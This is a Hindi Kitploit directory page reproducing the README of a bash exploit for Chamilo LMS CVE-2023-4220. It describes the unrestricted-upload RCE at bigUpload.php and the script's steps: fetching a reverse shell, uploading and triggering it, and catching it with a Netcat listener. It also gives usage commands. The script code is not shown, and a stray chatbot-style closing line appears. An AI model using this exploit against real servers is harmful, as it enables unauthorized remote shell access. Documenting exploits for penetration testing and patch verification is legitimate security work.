Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Chamilo-LMS-CVE-2023-4220-Exploit — bash में लिखा गया Chamilo LMS CVE-2023-4220 एक्सप्लॉइट का पुनर्निर्मित संस्करण | Kitploit
उपकरण/GitHubGitHub/0xdtc/chamilo-lms-cve-2023-4220-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHub0xdtc/chamilo-lms-cve-2023-4220-exploit

Chamilo-LMS-CVE-2023-4220-Exploit

bash में लिखा गया Chamilo LMS CVE-2023-4220 एक्सप्लॉइट का पुनर्निर्मित संस्करण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं
साझा करें

Chamilo LMS CVE-2023-4220 शोषण

अवलोकन

यह स्क्रिप्ट Chamilo LMS के ≤ v1.11.24 संस्करणों में एक रिमोट कोड निष्पादन (RCE) कमजोरी का शोषण करती है। यह कमजोरी (CVE-2023-4220) Chamilo LMS के bigUpload.php फीचर में असीमित फ़ाइल अपलोड कार्यक्षमता के कारण मौजूद है, जो हमलावरों को मनमानी फ़ाइलें (जैसे वेब शेल) अपलोड करने और उन्हें निष्पादित करने की अनुमति देती है, जिससे सर्वर पर पूर्ण रिमोट कोड निष्पादन होता है।

इस स्क्रिप्ट को Divine Clown द्वारा संवर्धित किया गया है ताकि शोषण प्रक्रिया को सुव्यवस्थित किया जा सके, स्वचालित रूप से एक रिवर्स शेल फ़ाइल उत्पन्न कर सके, इसे लक्ष्य पर अपलोड कर सके, और हमलावर को शेल तक सीधी पहुँच देने के लिए एक श्रोता (listener) प्रारंभ कर सके।


CVE विवरण

  • CVE ID: CVE-2023-4220
  • प्रभावित सॉफ़्टवेयर: Chamilo LMS ≤ v1.11.24
  • कमजोरी का प्रकार: Remote Code Execution (RCE)
  • हमला वेक्टर: /main/inc/lib/javascript/bigupload/inc/bigUpload.php में असीमित फ़ाइल अपलोड

विशेषताएँ

  • हमलावर के IP और पोर्ट के आधार पर revshells.com से स्वचालित रूप से एक रिवर्स शेल डाउनलोड करता है।
  • कमजोर bigUpload.php एंडपॉइंट का उपयोग करके रिवर्स शेल अपलोड करता है।
  • चुपके से शेल को ट्रिगर करता है और सीधी पहुँच के लिए Netcat श्रोता खोलता है।

Divine Clown द्वारा संवर्धन:

  • सभी मध्यवर्ती चरण (शेल डाउनलोड करना, अपलोड करना आदि) छिपे हुए हैं, केवल परिणामी रिवर्स शेल दिखाया गया है, जिससे उपयोग सुव्यवस्थित होता है।

उपयोग

root@kitploit:~
./CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>

पैरामीटर:

  • -i <attacker_ip>: रिवर्स शेल के लिए हमलावर का IP पता।
  • -p <port>: वह पोर्ट जहाँ Netcat श्रोता शुरू किया जाएगा।
  • -h <host_link>: कमजोर Chamilo LMS इंस्टेंस का पूरा URL।

उदाहरण:

root@kitploit:~
./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com

पूर्वापेक्षाएँ

  • आपकी मशीन पर Netcat स्थापित हो।
  • सुनिश्चित करें कि लक्ष्य Chamilo LMS संस्करण कमजोर है (≤ v1.11.24)।
  • पैनेट्रेशन टेस्टिंग या शोषण करने के लिए उचित अनुमतियाँ।

तकनीकी विवरण

  1. स्क्रिप्ट revshells.com से एक रिवर्स शेल डाउनलोड करती है, जो हमलावर के IP और पोर्ट के आधार पर गतिशील रूप से उत्पन्न होता है।
  2. रिवर्स शेल को कमजोर bigUpload.php एंडपॉइंट पर अपलोड किया जाता है।
  3. अपलोड की गई फ़ाइल को सर्वर पर उसके URL तक पहुँच कर निष्पादित किया जाता है।
  4. एक Netcat श्रोता शुरू किया जाता है, और एक बार फ़ाइल ट्रिगर होने पर, एक रिवर्स शेल कनेक्शन स्थापित होता है, जो हमलावर को कमांड-लाइन तक पहुँच प्रदान करता है।

कानूनी अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और परीक्षण वातावरणों के लिए है जहाँ आपके पास कमजोरियों का शोषण करने की स्पष्ट अनुमति है। सिस्टम तक अनधिकृत पहुँच अवैध है और इसके परिणामस्वरूप आपराधिक आरोप लग सकते हैं। लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं होंगे।


श्रेय

  • मूल शोषण लेखक: Ziad Sakr @Ziad-Sakr
  • संवर्धन और परिशोधन: ME(Divine Clown)

यदि आप कोई अतिरिक्त जानकारी या फ़ॉर्मेटिंग शामिल करना चाहते हैं तो README को और संशोधित करने के लिए स्वतंत्र महसूस करें! यदि आपको किसी और चीज़ की आवश्यकता हो तो मुझे बताएं।

टूल डाउनलोड करें